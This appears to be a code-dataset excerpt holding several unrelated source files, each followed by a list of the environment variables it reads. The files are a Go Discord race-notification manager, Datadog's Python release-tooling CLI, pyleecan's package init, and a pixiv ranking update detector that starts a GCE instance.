// NotificationManager is the generic notification handler, which calls the individual notification
// managers. Initially, only a Discord manager is implemented.
type NotificationManager struct {
discordManager *DiscordManager
carManager *CarManager
store Store
testing bool
}
func NewNotificationManager(discord *DiscordManager, cars *CarManager, store Store) *NotificationManager {
return &NotificationManager{
discordManager: discord,
carManager: cars,
store: store,
testing: os.Getenv("NOTIFICATION_TEST_MODE") == "true",
}
}
// check to see if any notification handlers need to process option changes
func (nm *NotificationManager) SaveServerOptions(oldServerOpts *GlobalServerConfig, newServerOpts *GlobalServerConfig) error {
return nm.discordManager.SaveServerOptions(oldServerOpts, newServerOpts)
}
func (nm *NotificationManager) Stop() error {
return nm.discordManager.Stop()
}
// HasNotificationReminders just tells us if we need to do any reminder scheduling
func (nm *NotificationManager) HasNotificationReminders() bool {
reminders := nm.GetNotificationReminders()
return len(reminders) > 0
}
// GetNotificationReminders returns an array of int timers
// Doesn't return errors, just omits anything it doesn't like and logs errors
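// For example, a NotificationReminderTimers value of "90, 30, 0," yields [90 30]:
// blank entries, zeroes and anything that fails to parse are dropped, apart from a log line.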
func (nm *NotificationManager) GetNotificationReminders() []int {
var reminders []int
serverOpts, err := nm.store.LoadServerOptions()
if err != nil {
logrus.WithError(err).Errorf("couldn't load server options")
return reminders
}
timers := strings.Split(serverOpts.NotificationReminderTimers, ",")
for _, a := range timers {
if strings.TrimSpace(a) == "" {
continue
}
i, err := strconv.Atoi(strings.TrimSpace(a))
if err != nil {
logrus.WithError(err).Errorf("couldn't convert notification time to int")
continue
}
if i == 0 {
continue
}
reminders = append(reminders, i)
}
return reminders
}
// SendMessage sends a message (surprise surprise)
func (nm *NotificationManager) SendMessage(title string, msg string) error {
var err error
// Call all message senders here ... atm just discord. The manager will know if it's enabled or not, so just call it
if !nm.testing {
err = nm.discordManager.SendMessage(title, msg)
}
return err
}
// SendMessageWithLink sends a message with an embedded CM join link
func (nm *NotificationManager) SendMessageWithLink(title string, msg string, linkText string, link *url.URL) error {
var err error
// Call all message senders here ... atm just discord. The manager will know if it's enabled or not, so just call it
if !nm.testing {
err = nm.discordManager.SendMessageWithLink(title, msg, linkText, link)
}
return err
}
// SendRaceStartMessage sends a message as a race session is started
func (nm *NotificationManager) SendRaceStartMessage(config ServerConfig, event RaceEvent) error {
serverOpts, err := nm.store.LoadServerOptions()
if err != nil {
logrus.WithError(err).Errorf("couldn't load server options, skipping notification")
return err
}
msg := ""
eventName := event.EventName()
trackInfo := trackSummary(config.CurrentRaceConfig.Track, config.CurrentRaceConfig.TrackLayout)
if eventName != "" {
msg = fmt.Sprintf("%s race at %s is starting now", eventName, trackInfo)
} else {
msg = fmt.Sprintf("Race at %s is starting now", trackInfo)
}
msg += fmt.Sprintf("\nServer: %s", serverOpts.Name)
if serverOpts.ShowPasswordInNotifications == 1 {
passwordString := "\nNo password"
if event.OverrideServerPassword() {
if event.ReplacementServerPassword() != "" {
passwordString = fmt.Sprintf("\nPassword is '%s' (no quotes)", event.ReplacementServerPassword())
}
} else if config.GlobalServerConfig.Password != "" {
passwordString = fmt.Sprintf("\nPassword is '%s' (no quotes)", config.GlobalServerConfig.Password)
}
msg += passwordString
}
title := fmt.Sprintf("Race starting at %s", trackInfo)
if config.GlobalServerConfig.ShowContentManagerJoinLink == 1 {
link, err := getContentManagerJoinLink(config)
linkText := ""
if err != nil {
logrus.WithError(err).Errorf("could not get CM join link")
return nm.SendMessage(title, msg)
} else {
linkText = "Content Manager join link"
// delay sending message by 20 seconds to give server time to register with lobby so CM link works
time.AfterFunc(time.Duration(20)*time.Second, func() {
_ = nm.SendMessageWithLink(title, msg, linkText, link)
})
return nil
}
} else {
return nm.SendMessage(title, msg)
}
}
// GetCarList takes a semicolon-separated string of cars from a race config and returns a comma-separated list of their UI names, with download links added where available
func (nm *NotificationManager) GetCarList(cars string) string {
var aCarNames []string
for _, carName := range strings.Split(cars, ";") {
car, err := nm.carManager.LoadCar(carName, nil)
if err != nil {
logrus.WithError(err).Warnf("Could not load car details for: %s", carName)
continue
}
if car.Details.DownloadURL != "" {
aCarNames = append(aCarNames, car.Details.Name+" ([download]("+car.Details.DownloadURL+"))")
} else {
aCarNames = append(aCarNames, car.Details.Name)
}
}
return strings.Join(aCarNames, ", ")
}
// GetTrackInfo returns the track summary with any download link appended
func (nm *NotificationManager) GetTrackInfo(track string, layout string, download bool) string {
trackInfo := trackSummary(track, layout)
if download {
trackLink := trackDownloadLink(track)
if trackLink != "" {
trackInfo += " ([download](" + trackLink + "))"
}
}
return trackInfo
}
// SendRaceScheduledMessage sends a notification when a race is scheduled
func (nm *NotificationManager) SendRaceScheduledMessage(event *CustomRace, date time.Time) error {
serverOpts, err := nm.store.LoadServerOptions()
if err != nil {
logrus.WithError(err).Errorf("couldn't load server options, skipping notification")
return err
}
if serverOpts.NotifyWhenScheduled != 1 {
return nil
}
msg := "A new event has been scheduled\n"
msg += fmt.Sprintf("Server: %s\n", serverOpts.Name)
eventName := event.EventName()
if eventName != "" {
msg += fmt.Sprintf("Event name: %s\n", eventName)
}
msg += fmt.Sprintf("Date: %s\n", date.Format("Mon, 02 Jan 2006 15:04:05 MST"))
carNames := nm.GetCarList(event.RaceConfig.Cars)
trackInfo := nm.GetTrackInfo(event.RaceConfig.Track, event.RaceConfig.TrackLayout, true)
msg += fmt.Sprintf("Track: %s\n", trackInfo)
msg += fmt.Sprintf("Car(s): %s\n", carNames)
title := fmt.Sprintf("Race scheduled at %s", nm.GetTrackInfo(event.RaceConfig.Track, event.RaceConfig.TrackLayout, false))
return nm.SendMessage(title, msg)
}
// SendRaceCancelledMessage sends a notification when a race is cancelled
func (nm *NotificationManager) SendRaceCancelledMessage(event *CustomRace, date time.Time) error {
serverOpts, err := nm.store.LoadServerOptions()
if err != nil {
logrus.WithError(err).Errorf("couldn't load server options, skipping notification")
return err
}
if serverOpts.NotifyWhenScheduled != 1 {
return nil
}
dateStr := date.Format("Mon, 02 Jan 2006 15:04:05 MST")
msg := "The following scheduled race has been cancelled\n"
msg += fmt.Sprintf("Server: %s\n", serverOpts.Name)
eventName := event.EventName()
trackInfo := trackSummary(event.RaceConfig.Track, event.RaceConfig.TrackLayout)
if eventName != "" {
msg += fmt.Sprintf("Event name: %s\n", eventName)
}
msg += fmt.Sprintf("Date: %s\n", dateStr)
msg += fmt.Sprintf("Track: %s\n", trackInfo)
title := fmt.Sprintf("Race cancelled at %s", trackInfo)
return nm.SendMessage(title, msg)
}
// SendRaceReminderMessage sends a reminder a configurable number of minutes prior to a race starting
func (nm *NotificationManager) SendRaceReminderMessage(event *CustomRace, timer int) error {
msg := ""
trackInfo := nm.GetTrackInfo(event.RaceConfig.Track, event.RaceConfig.TrackLayout, true)
eventName := event.EventName()
carList := nm.GetCarList(event.RaceConfig.Cars)
reminder := durafmt.Parse(time.Duration(timer) * time.Minute).String()
if eventName != "" {
msg = fmt.Sprintf("%s race at %s starts in %s\nCars: %s", eventName, trackInfo, reminder, carList)
} else {
msg = fmt.Sprintf("Race at %s starts in %s\nCars: %s", trackInfo, reminder, carList)
}
title := fmt.Sprintf("Race reminder - %s", reminder)
return nm.SendMessage(title, msg)
}
// SendChampionshipReminderMessage sends a reminder a configurable number of minutes prior to a championship race starting
func (nm *NotificationManager) SendChampionshipReminderMessage(championship *Championship, event *ChampionshipEvent, timer int) error {
reminder := durafmt.Parse(time.Duration(timer) * time.Minute).String()
title := fmt.Sprintf("Race reminder - %s", reminder)
trackInfo := nm.GetTrackInfo(event.RaceSetup.Track, event.RaceSetup.TrackLayout, true)
msg := fmt.Sprintf("%s race at %s starts in %s", championship.Name, trackInfo, reminder)
return nm.SendMessage(title, msg)
}
// SendRaceWeekendReminderMessage sends a reminder a configurable number of minutes prior to a RaceWeekendSession starting
func (nm *NotificationManager) SendRaceWeekendReminderMessage(raceWeekend *RaceWeekend, session *RaceWeekendSession, timer int) error {
reminder := durafmt.Parse(time.Duration(timer) * time.Minute).String()
title := fmt.Sprintf("Race reminder - %s", reminder)
trackInfo := nm.GetTrackInfo(session.RaceConfig.Track, session.RaceConfig.TrackLayout, true)
msg := fmt.Sprintf("%s at %s (%s Race Weekend) starts in %s", session.Name(), raceWeekend.Name, trackInfo, reminder)
return nm.SendMessage(title, msg)
}
| [
"\"NOTIFICATION_TEST_MODE\""
]
| []
| [
"NOTIFICATION_TEST_MODE"
]
| [] | ["NOTIFICATION_TEST_MODE"] | go | 1 | 0 | |
datadog_checks_dev/datadog_checks/dev/tooling/commands/release.py | # (C) Datadog, Inc. 2018
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import os
import time
from collections import OrderedDict, namedtuple
from datetime import datetime
import click
from semver import parse_version_info
from six import StringIO, iteritems
from .dep import freeze as dep_freeze
from .utils import (
CONTEXT_SETTINGS, abort, echo_failure, echo_info, echo_success, echo_waiting, echo_warning
)
from ..constants import (
AGENT_REQ_FILE, AGENT_V5_ONLY, CHANGELOG_TYPE_NONE, get_root
)
from ..git import (
get_current_branch, parse_pr_numbers, get_diff, git_tag, git_commit
)
from ..github import from_contributor, get_changelog_types, get_pr, get_pr_from_hash
from ..release import (
get_agent_requirement_line, get_release_tag_string, update_agent_requirements,
update_version_module
)
from ..trello import TrelloClient
from ..utils import (
get_bump_function, get_current_agent_version, get_valid_checks,
get_version_string, format_commit_id, parse_pr_number
)
from ...structures import EnvVars
from ...subprocess import run_command
from ...utils import (
basepath, chdir, ensure_unicode, get_next, remove_path, stream_file_lines,
write_file, write_file_lines
)
ChangelogEntry = namedtuple('ChangelogEntry', 'number, title, url, author, author_url, from_contributor')
def validate_version(ctx, param, value):
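# Click callback: accepts "x.y" or "x.y.z", validates it as semver and hands
# back just the "major.minor" part used to locate the Agent release branch.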
if not value or ctx.resilient_parsing:
return
try:
parts = value.split('.')
if len(parts) == 2:
parts.append('0')
version_info = parse_version_info('.'.join(parts))
return '{}.{}'.format(version_info.major, version_info.minor)
except ValueError:
raise click.BadParameter('needs to be in semver format x.y[.z]')
@click.group(
context_settings=CONTEXT_SETTINGS,
short_help='Manage the release of checks'
)
def release():
pass
@release.group(
context_settings=CONTEXT_SETTINGS,
short_help='Show release information'
)
def show():
"""To avoid GitHub's public API rate limits, you need to set
`github.user`/`github.token` in your config file or use the
`DD_GITHUB_USER`/`DD_GITHUB_TOKEN` environment variables.
"""
pass
@show.command(
context_settings=CONTEXT_SETTINGS,
short_help='Show all the checks that can be released'
)
@click.option('--quiet', '-q', is_flag=True)
@click.pass_context
def ready(ctx, quiet):
"""Show all the checks that can be released."""
user_config = ctx.obj
cached_prs = {}
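# Cache PR -> changelog-label lookups so a pull request touching several
# checks only costs one GitHub API call.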
for target in sorted(get_valid_checks()):
# get the name of the current release tag
cur_version = get_version_string(target)
target_tag = get_release_tag_string(target, cur_version)
# get the diff from HEAD
diff_lines = get_diff(target, target_tag)
# get the number of PRs that could be potentially released
# Only show the ones that have a changelog label that isn't no-changelog
pr_numbers = parse_pr_numbers(diff_lines)
shippable_prs = 0
for pr_num in pr_numbers:
try:
if pr_num in cached_prs:
changelog_labels = cached_prs[pr_num]
if len(changelog_labels) != 1:
continue
else:
payload = get_pr(pr_num, user_config)
changelog_labels = get_changelog_types(payload)
cached_prs[pr_num] = changelog_labels
if not changelog_labels:
echo_warning(
'PR #{} has no changelog label attached, please add one! Skipping...'.format(pr_num)
)
continue
if len(changelog_labels) > 1:
echo_warning(
'Multiple changelog labels found attached to PR #{}, '
'please only use one! Skipping...'.format(pr_num)
)
continue
if changelog_labels[0] != CHANGELOG_TYPE_NONE:
shippable_prs += 1
except Exception as e:
echo_failure('Unable to fetch info for PR #{}: {}'.format(pr_num, e))
continue
if shippable_prs:
if quiet:
msg = target
else:
msg = (
'Check {} has {} out of {} merged PRs that could be released'
''.format(target, shippable_prs, len(pr_numbers))
)
echo_info(msg)
@show.command(
context_settings=CONTEXT_SETTINGS,
short_help='Show all the pending PRs for a given check'
)
@click.argument('check')
@click.option('--dry-run', '-n', is_flag=True)
@click.pass_context
def changes(ctx, check, dry_run):
"""Show all the pending PRs for a given check."""
if not dry_run and check not in get_valid_checks():
abort('Check `{}` is not an Agent-based Integration'.format(check))
# get the name of the current release tag
cur_version = get_version_string(check)
target_tag = get_release_tag_string(check, cur_version)
# get the diff from HEAD
diff_lines = get_diff(check, target_tag)
# for each PR get the title, we'll use it to populate the changelog
pr_numbers = parse_pr_numbers(diff_lines)
if not dry_run:
echo_info('Found {} PRs merged since tag: {}'.format(len(pr_numbers), target_tag))
user_config = ctx.obj
if dry_run:
changelog_types = []
for pr_num in pr_numbers:
try:
payload = get_pr(pr_num, user_config)
except Exception as e:
echo_failure('Unable to fetch info for PR #{}: {}'.format(pr_num, e))
continue
current_changelog_types = get_changelog_types(payload)
if not current_changelog_types:
abort('No valid changelog labels found attached to PR #{}, please add one!'.format(pr_num))
elif len(current_changelog_types) > 1:
abort('Multiple changelog labels found attached to PR #{}, please only use one!'.format(pr_num))
current_changelog_type = current_changelog_types[0]
if current_changelog_type != 'no-changelog':
changelog_types.append(current_changelog_type)
return cur_version, changelog_types
else:
for pr_num in pr_numbers:
try:
payload = get_pr(pr_num, user_config)
except Exception as e:
echo_failure('Unable to fetch info for PR #{}: {}'.format(pr_num, e))
continue
changelog_types = get_changelog_types(payload)
echo_success(payload.get('title'))
echo_info(' * Url: {}'.format(payload.get('html_url')))
echo_info(' * Changelog status: ', nl=False)
if not changelog_types:
echo_warning('WARNING! No changelog labels attached.\n')
elif len(changelog_types) > 1:
echo_warning('WARNING! Too many changelog labels attached: {}\n'.format(', '.join(changelog_types)))
else:
echo_success('{}\n'.format(changelog_types[0]))
@release.command(
context_settings=CONTEXT_SETTINGS,
short_help='Create a Trello card for each change that needs to be tested'
)
@click.option('--start', 'start_id', help='The PR number or commit hash to start at')
@click.option('--since', 'agent_version', callback=validate_version, help='The version of the Agent to compare')
@click.option('--dry-run', '-n', is_flag=True, help='Only show the changes')
@click.pass_context
def testable(ctx, start_id, agent_version, dry_run):
"""Create a Trello card for each change that needs to be tested for
the next release. Run via `ddev -x release testable` to force the use
of the current directory.
To avoid GitHub's public API rate limits, you need to set
`github.user`/`github.token` in your config file or use the
`DD_GITHUB_USER`/`DD_GITHUB_TOKEN` environment variables.
\b
To use Trello:
1. Go to `https://trello.com/app-key` and copy your API key.
2. Run `ddev config set trello.key` and paste your API key.
3. Go to `https://trello.com/1/authorize?key=key&name=name&scope=read,write&expiration=never&response_type=token`,
where `key` is your API key and `name` is the name to give your token, e.g. ReleaseTestingYourName.
Authorize access and copy your token.
4. Run `ddev config set trello.token` and paste your token.
"""
root = get_root()
repo = basepath(root)
if repo not in ('integrations-core', 'datadog-agent'):
abort('Repo `{}` is unsupported.'.format(repo))
if agent_version:
current_agent_version = agent_version
else:
echo_waiting('Finding the current minor release of the Agent... ', nl=False)
current_agent_version = get_current_agent_version()
echo_success(current_agent_version)
current_release_branch = '{}.x'.format(current_agent_version)
echo_info(
'Branch `{}` will be compared to `master`.'.format(current_release_branch)
)
echo_waiting('Getting diff... ', nl=False)
diff_command = 'git --no-pager log "--pretty=format:%H %s" {}..master'
with chdir(root):
result = run_command(diff_command.format(current_release_branch), capture=True)
if result.code:
origin_release_branch = 'origin/{}'.format(current_release_branch)
echo_failure('failed!')
echo_waiting(
'Local branch `{}` might not exist, trying `{}`... '.format(
current_release_branch, origin_release_branch
),
nl=False
)
result = run_command(diff_command.format(origin_release_branch), capture=True)
if result.code:
abort('Unable to get the diff.')
else:
echo_success('success!')
else:
echo_success('success!')
# [(commit_hash, commit_subject), ...]
diff_data = [
tuple(line.split(None, 1)) for line in reversed(result.stdout.splitlines())
]
num_changes = len(diff_data)
if dry_run:
for _, commit_subject in diff_data:
echo_info(commit_subject)
return
if repo == 'integrations-core':
options = OrderedDict((
('1', 'Integrations'),
('2', 'Containers'),
('s', 'Skip'),
('q', 'Quit'),
))
else:
options = OrderedDict((
('1', 'Agent'),
('2', 'Containers'),
('s', 'Skip'),
('q', 'Quit'),
))
default_option = get_next(options)
options_prompt = 'Choose an option (default {}): '.format(options[default_option])
options_text = '\n' + '\n'.join(
'{} - {}'.format(key, value) for key, value in iteritems(options)
)
commit_ids = set()
user_config = ctx.obj
trello = TrelloClient(user_config)
found_start_id = False
for i, (commit_hash, commit_subject) in enumerate(diff_data, 1):
commit_id = parse_pr_number(commit_subject)
if commit_id:
pr_data = get_pr(commit_id, user_config, repo=repo)
else:
try:
pr_data = get_pr_from_hash(commit_hash, repo, user_config).get('items', [{}])[0]
# Commit to master
except IndexError:
pr_data = {
'number': commit_hash,
'html_url': 'https://github.com/DataDog/{}/commit/{}'.format(repo, commit_hash),
}
commit_id = str(pr_data.get('number', ''))
if commit_id and commit_id in commit_ids:
echo_info('Already seen PR #{}, skipping it.'.format(commit_id))
continue
commit_ids.add(commit_id)
if start_id and not found_start_id:
if start_id == commit_id or start_id == commit_hash:
found_start_id = True
else:
echo_info(
'Looking for {}, skipping {}.'.format(
format_commit_id(start_id), format_commit_id(commit_id)
)
)
continue
pr_url = pr_data.get('html_url', 'https://github.com/DataDog/{}/pull/{}'.format(repo, commit_id))
pr_title = pr_data.get('title', commit_subject)
pr_author = pr_data.get('user', {}).get('login', '')
pr_body = pr_data.get('body', '')
finished = False
choice_error = ''
progress_status = '({} of {}) '.format(i, num_changes)
indent = ' ' * len(progress_status)
while not finished:
echo_success('\n{}{}'.format(progress_status, pr_title))
echo_success('Url: ', nl=False, indent=indent)
echo_info(pr_url)
echo_success('Author: ', nl=False, indent=indent)
echo_info(pr_author)
# Ensure Unix lines feeds just in case
echo_info(pr_body.strip('\r'), indent=indent)
echo_info(options_text)
if choice_error:
echo_warning(choice_error)
echo_waiting(options_prompt, nl=False)
# Terminals are odd and sometimes produce an erroneous null byte
choice = '\x00'
while choice == '\x00':
choice = click.getchar().strip()
try:
choice = ensure_unicode(choice)
except UnicodeDecodeError:
choice = repr(choice)
if not choice:
choice = default_option
if choice not in options:
echo_info(choice)
choice_error = u'`{}` is not a valid option.'.format(choice)
continue
else:
choice_error = ''
value = options[choice]
echo_info(value)
if value == 'Skip':
echo_info('Skipped {}'.format(format_commit_id(commit_id)))
break
elif value == 'Quit':
echo_warning('Exited at {}'.format(format_commit_id(commit_id)))
return
else:
creation_attempts = 3
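# Try the card creation a few times, waiting longer when Trello reports that
# we are being rate limited.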
for attempt in range(creation_attempts):
rate_limited, error, response = trello.create_card(
value,
pr_title,
u'Pull request: {}\n\n{}'.format(pr_url, pr_body)
)
if rate_limited:
wait_time = 10
echo_warning(
'Attempt {} of {}: A rate limit is in effect, retrying in {} '
'seconds...'.format(attempt + 1, creation_attempts, wait_time)
)
time.sleep(wait_time)
elif error:
if attempt + 1 == creation_attempts:
echo_failure('Error: {}'.format(error))
break
wait_time = 2
echo_warning(
'Attempt {} of {}: An error has occurred, retrying in {} '
'seconds...'.format(attempt + 1, creation_attempts, wait_time)
)
time.sleep(wait_time)
else:
echo_success('Created card: ', nl=False)
echo_info(response.json().get('url'))
break
finished = True
@release.command(
context_settings=CONTEXT_SETTINGS,
short_help='Tag the git repo with the current release of a check'
)
@click.argument('check')
@click.argument('version', required=False)
@click.option('--push/--no-push', default=True)
@click.option('--dry-run', '-n', is_flag=True)
def tag(check, version, push, dry_run):
"""Tag the HEAD of the git repo with the current release number for a
specific check. The tag is pushed to origin by default.
Notice: specifying a different version than the one in __about__.py is
a maintenance task that should be run under very specific circumstances
(e.g. re-align an old release performed on the wrong commit).
"""
tagging_all = check == 'all'
valid_checks = get_valid_checks()
if not tagging_all and check not in valid_checks:
abort('Check `{}` is not an Agent-based Integration'.format(check))
if tagging_all:
if version:
abort('You cannot tag every check with the same version')
checks = sorted(valid_checks)
else:
checks = [check]
for check in checks:
echo_success('Check `{}`'.format(check))
# get the current version
if not version:
version = get_version_string(check)
# get the tag name
release_tag = get_release_tag_string(check, version)
echo_waiting('Tagging HEAD with {}'.format(release_tag))
if dry_run:
version = None
continue
result = git_tag(release_tag, push)
# For automation we may want to cause failures for extant tags
if result.code == 128 or 'already exists' in result.stderr:
echo_warning('Tag `{}` already exists, skipping...'.format(release_tag))
elif result.code != 0:
abort(code=result.code)
# Reset version
version = None
@release.command(
context_settings=CONTEXT_SETTINGS,
short_help='Release a single check'
)
@click.argument('check')
@click.argument('version', required=False)
@click.pass_context
def make(ctx, check, version):
"""Perform a set of operations needed to release a single check:
\b
* update the version in __about__.py
* update the changelog
* update the requirements-agent-release.txt file
* commit the above changes
"""
valid_checks = get_valid_checks()
if check != 'all' and check not in valid_checks:
abort('Check `{}` is not an Agent-based Integration'.format(check))
# don't run the task on the master branch
if get_current_branch() == 'master':
abort('This task will commit, you do not want to add commits to master directly')
if check == 'all':
if version:
abort('You cannot bump every check to the same version')
checks = sorted(valid_checks)
else:
checks = [check]
for check in checks:
echo_success('Check `{}`'.format(check))
if version:
# sanity check on the version provided
cur_version = get_version_string(check)
p_version = parse_version_info(version)
p_current = parse_version_info(cur_version)
if p_version <= p_current:
abort('Current version is {}, cannot bump to {}'.format(cur_version, version))
else:
cur_version, changelog_types = ctx.invoke(changes, check=check, dry_run=True)
if not changelog_types:
echo_warning('No changes for {}, skipping...'.format(check))
continue
bump_function = get_bump_function(changelog_types)
version = bump_function(cur_version)
# update the version number
echo_info('Current version of check {}: {}, bumping to: {}'.format(check, cur_version, version))
update_version_module(check, cur_version, version)
# update the CHANGELOG
echo_waiting('Updating the changelog...')
# TODO: Avoid double GitHub API calls when bumping all checks at once
ctx.invoke(
changelog, check=check, version=version, old_version=cur_version, quiet=True, dry_run=False
)
if check == 'datadog_checks_dev':
commit_targets = [check]
# update the global requirements file
else:
commit_targets = [check, AGENT_REQ_FILE]
req_file = os.path.join(get_root(), AGENT_REQ_FILE)
echo_waiting('Updating the requirements file {}...'.format(req_file))
update_agent_requirements(req_file, check, get_agent_requirement_line(check, version))
# commit the changes.
# do not use [ci skip] so releases get built https://docs.gitlab.com/ee/ci/yaml/#skipping-jobs
msg = '[Release] Bumped {} version to {}'.format(check, version)
git_commit(commit_targets, msg)
# Reset version
version = None
# done
echo_success('All done, remember to push to origin and open a PR to merge these changes on master')
@release.command(
context_settings=CONTEXT_SETTINGS,
short_help='Update the changelog for a check'
)
@click.argument('check')
@click.argument('version')
@click.argument('old_version', required=False)
@click.option('--quiet', '-q', is_flag=True)
@click.option('--dry-run', '-n', is_flag=True)
@click.pass_context
def changelog(ctx, check, version, old_version, quiet, dry_run):
"""Perform the operations needed to update the changelog.
This method is supposed to be used by other tasks and not directly.
"""
if check not in get_valid_checks():
abort('Check `{}` is not an Agent-based Integration'.format(check))
# sanity check on the version provided
cur_version = old_version or get_version_string(check)
if parse_version_info(version) <= parse_version_info(cur_version):
abort('Current version is {}, cannot bump to {}'.format(cur_version, version))
if not quiet:
echo_info('Current version of check {}: {}, bumping to: {}'.format(check, cur_version, version))
# get the name of the current release tag
target_tag = get_release_tag_string(check, cur_version)
# get the diff from HEAD
diff_lines = get_diff(check, target_tag)
# for each PR get the title, we'll use it to populate the changelog
pr_numbers = parse_pr_numbers(diff_lines)
if not quiet:
echo_info('Found {} PRs merged since tag: {}'.format(len(pr_numbers), target_tag))
user_config = ctx.obj
entries = []
for pr_num in pr_numbers:
try:
payload = get_pr(pr_num, user_config)
except Exception as e:
echo_failure('Unable to fetch info for PR #{}: {}'.format(pr_num, e))
continue
changelog_labels = get_changelog_types(payload)
if not changelog_labels:
abort('No valid changelog labels found attached to PR #{}, please add one!'.format(pr_num))
elif len(changelog_labels) > 1:
abort('Multiple changelog labels found attached to PR #{}, please only use one!'.format(pr_num))
changelog_type = changelog_labels[0]
if changelog_type == CHANGELOG_TYPE_NONE:
if not quiet:
# No changelog entry for this PR
echo_info('Skipping PR #{} from changelog due to label'.format(pr_num))
continue
author = payload.get('user', {}).get('login')
author_url = payload.get('user', {}).get('html_url')
title = '[{}] {}'.format(changelog_type, payload.get('title'))
entry = ChangelogEntry(
pr_num, title, payload.get('html_url'), author, author_url, from_contributor(payload)
)
entries.append(entry)
# store the new changelog in memory
new_entry = StringIO()
# the header contains version and date
header = '## {} / {}\n'.format(version, datetime.now().strftime('%Y-%m-%d'))
new_entry.write(header)
# one bullet point for each PR
new_entry.write('\n')
for entry in entries:
thanks_note = ''
if entry.from_contributor:
thanks_note = ' Thanks [{}]({}).'.format(entry.author, entry.author_url)
new_entry.write('* {}. See [#{}]({}).{}\n'.format(entry.title, entry.number, entry.url, thanks_note))
new_entry.write('\n')
# read the old contents
changelog_path = os.path.join(get_root(), check, 'CHANGELOG.md')
old = list(stream_file_lines(changelog_path))
# write the new changelog in memory
changelog_buffer = StringIO()
# preserve the title
changelog_buffer.write(''.join(old[:2]))
# prepend the new changelog to the old contents
# make the command idempotent
if header not in old:
changelog_buffer.write(new_entry.getvalue())
# append the rest of the old changelog
changelog_buffer.write(''.join(old[2:]))
# print on the standard out in case of a dry run
if dry_run:
echo_info(changelog_buffer.getvalue())
else:
# overwrite the old changelog
write_file(changelog_path, changelog_buffer.getvalue())
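# Illustrative only (added for clarity, not part of the original module): given
# version "1.2.3" and a PR titled "Added new metric", the block prepended above
# would look roughly like:
#
#   ## 1.2.3 / 2018-06-07
#
#   * [Added] Added new metric. See [#1234](https://github.com/...). Thanks [user](https://github.com/user).
#
# The header and bullet formats come directly from the `header` and
# `new_entry.write` calls in this function; the PR number, date and URLs here
# are hypothetical.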
@release.command(
context_settings=CONTEXT_SETTINGS,
short_help='Build and upload a check to PyPI'
)
@click.argument('check')
@click.option('--dry-run', '-n', is_flag=True)
@click.pass_context
def upload(ctx, check, dry_run):
"""Release a specific check to PyPI as it is on the repo HEAD."""
if check not in get_valid_checks():
abort('Check `{}` is not an Agent-based Integration'.format(check))
# retrieve credentials
pypi_config = ctx.obj.get('pypi', {})
username = pypi_config.get('user') or os.getenv('TWINE_USERNAME')
password = pypi_config.get('pass') or os.getenv('TWINE_PASSWORD')
if not (username and password):
abort('This requires pypi.user and pypi.pass configuration. Please see `ddev config -h`.')
auth_env_vars = {'TWINE_USERNAME': username, 'TWINE_PASSWORD': password}
echo_waiting('Building and publishing `{}` to PyPI...'.format(check))
check_dir = os.path.join(get_root(), check)
remove_path(os.path.join(check_dir, 'dist'))
with chdir(check_dir), EnvVars(auth_env_vars):
result = run_command('python setup.py bdist_wheel --universal', capture='out')
if result.code != 0:
abort(result.stdout, result.code)
echo_waiting('Build done, uploading the package...')
if not dry_run:
result = run_command('twine upload --skip-existing dist{}*'.format(os.path.sep))
if result.code != 0:
abort(code=result.code)
echo_success('Success!')
@release.command(
context_settings=CONTEXT_SETTINGS,
short_help="Update the Agent's release and static dependency files"
)
@click.option('--no-deps', is_flag=True, help='Do not create the static dependency file')
@click.pass_context
def freeze(ctx, no_deps):
"""Write the `requirements-agent-release.txt` file at the root of the repo
listing all the Agent-based integrations pinned at the version they currently
have in HEAD. Also by default will create the Agent's static dependency file.
"""
echo_info('Freezing check releases')
checks = get_valid_checks()
checks.remove('datadog_checks_dev')
entries = []
for check in checks:
if check in AGENT_V5_ONLY:
echo_info('Check `{}` is only shipped with Agent 5, skipping'.format(check))
continue
try:
version = get_version_string(check)
entries.append('{}\n'.format(get_agent_requirement_line(check, version)))
except Exception as e:
echo_failure('Error generating line: {}'.format(e))
continue
lines = sorted(entries)
req_file = os.path.join(get_root(), AGENT_REQ_FILE)
write_file_lines(req_file, lines)
echo_success('Successfully wrote to `{}`!'.format(req_file))
if not no_deps:
ctx.invoke(dep_freeze)
| []
| []
| [
"TWINE_PASSWORD",
"TWINE_USERNAME"
]
| [] | ["TWINE_PASSWORD", "TWINE_USERNAME"] | python | 2 | 0 | |
pyleecan/__init__.py | # -*- coding: utf-8 -*-
from .loggers import init_default_log
import os
import platform
PACKAGE_NAME = "pyleecan"
# User folder (to store machine/materials/config)
if platform.system() == "Windows":
USER_DIR = os.path.join(os.environ["APPDATA"], PACKAGE_NAME)
USER_DIR = USER_DIR.replace("\\", "/")
else:
USER_DIR = os.environ["HOME"] + "/.local/share/" + PACKAGE_NAME
__version__ = "1.3.2"
init_default_log()
| []
| []
| [
"APPDATA",
"HOME"
]
| [] | ["APPDATA", "HOME"] | python | 2 | 0 | |
Server/pipeline/pixiv-scraper-old/update_detector/update_detector.py | import requests
from bs4 import BeautifulSoup
import googleapiclient.discovery
import traceback
import json
import os
URL_RANKING = "https://www.pixiv.net/ranking.php?mode=daily&content=illust"
API_URL = os.getenv("API_URL")
PROJECT = os.getenv("PROJECT")
ZONE = os.getenv("ZONE")
INSTANCE_NAME = os.getenv("INSTANCE_NAME")
def get_pipeline_timestamp():
res = requests.get(API_URL, timeout=90)
json_res = res.json()
timestamp = json_res['latest']
return timestamp
def get_pixiv_timestamp():
res = requests.get(URL_RANKING, timeout=90, headers={
"Accept-Language": "en-US"})
soup = BeautifulSoup(res.text, "html.parser")
page_title = soup.find('title').getText()
timestamp = page_title.split(" ")[-1].replace('/', '-')
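# Illustrative only: if the ranking page title ends with a date such as
# "2021/06/15" (the en-US Accept-Language header is sent above), the line above
# yields "2021-06-15". The exact title wording is an assumption; only the
# split/replace transformation is taken from the code itself.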
return timestamp
def start_instance():
compute = googleapiclient.discovery.build(
'compute', 'v1', cache_discovery=False)
command = compute.instances().start(
project=PROJECT, zone=ZONE, instance=INSTANCE_NAME)
json_res = json.dumps(command.execute())
return(json_res)
def main(request):
try:
latest_timestamp = get_pipeline_timestamp()
pixiv_timestamp = get_pixiv_timestamp()
if pixiv_timestamp == latest_timestamp:
print("No update detected")
else:
print("Update detected")
start_instance()
return "Success"
except Exception as e:
print(e)
print(traceback.print_exc())
return str(e)
if __name__ == "__main__":
print(main("")) | []
| []
| [
"ZONE",
"PROJECT",
"API_URL",
"INSTANCE_NAME"
]
